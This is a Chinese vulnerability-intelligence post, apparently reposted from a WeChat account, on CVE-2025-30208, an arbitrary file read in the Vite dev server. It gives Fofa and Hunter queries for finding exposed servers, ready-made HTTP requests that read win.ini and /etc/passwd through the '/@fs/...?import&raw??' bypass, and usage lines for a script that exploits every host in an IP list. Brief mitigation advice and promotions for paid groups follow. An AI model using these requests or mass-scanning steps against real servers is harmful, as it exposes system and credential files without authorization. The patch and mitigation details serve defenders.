Vite 任意文件读取漏洞分析CVE-2025-30208
前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请私聊删除。需要加交流群在最下方。还在学怎么挖通用漏洞和src吗?考安全证书请联系vx咨询知识星球在最下方,续费也有优惠私聊~~
后台聊天框回复CVE-2025-30208获取poc,这个漏洞利用昨天已经第一时间发至星球。
1、漏洞介绍
Vite是Vite开源的一种新型的前端构建工具。Vite存在访问控制错误漏洞,该漏洞源于URL中的?raw??或?import&raw??可以绕过文件访问限制,返回任意文件内容。
2、影响版本
6.2.0 >= Vite <=6.2.26.1.0 >= Vite <=6.1.1 6.0.0 >= Vite <=6.0.115.0.0 >= Vite <=5.4.14Vite <=4.5.9
3、📦 命令使用
Fofa测绘语句:
body="/@vite/client"
鹰图Hunter测绘语句:
web.body="/@vite/client"
4、🔍 POC
Windows:
GET /@fs/C://windows/win.ini?import&raw?? HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-Alive
Linux:
GET /@fs/etc/passwd?import&raw?? HTTP/1.1Host: xx.xx.xx.xxUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-Alive
5、 🛠️ exp与poc?
5.1、 使用ThumpBo师傅昨天第一时间分享exp
Exp脚本使用方法
-u 进行检测-p 自定义payload eg. /etc/passwd-d 可以使用字典进行fuzz测试不走代理使用本Exppython3 Vite-CVE-2025-30208-EXP.py -f ip.txt走HTTP代理使用本Exppython3 Vite-CVE-2025-30208-EXP.py -f ip.txt --proxy http://127.0.0.1:8080
pip安装库
pip install -r requirements.txt
命令:
pip install -r requirements.txt
5.2、 poc分享
后台聊天框回复CVE-2025-30208获取poc
6、 🛠️ 指纹匹配语法
临时缓解方案:部署针对项目的监控系统:阻止包含“@fs” 或 “?import&raw??” 的外部用户请求到达您的应用程序。
1.通过限制开发服务器的访问权限,如关闭ѕеrvеr.hоѕt或将其绑定到特定的IP地址,以减少攻击面。
2.避免将开发服务器临时映射到公网供远程调试
升级修复:目前官方已发布修复安全补丁
https://github.com/vitejs/vite/releases
原文始发于微信公众号(不秃头的安全):漏洞情报 | (资产巨多)Vite 任意文件读取漏洞分析 CVE-2025-30208
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论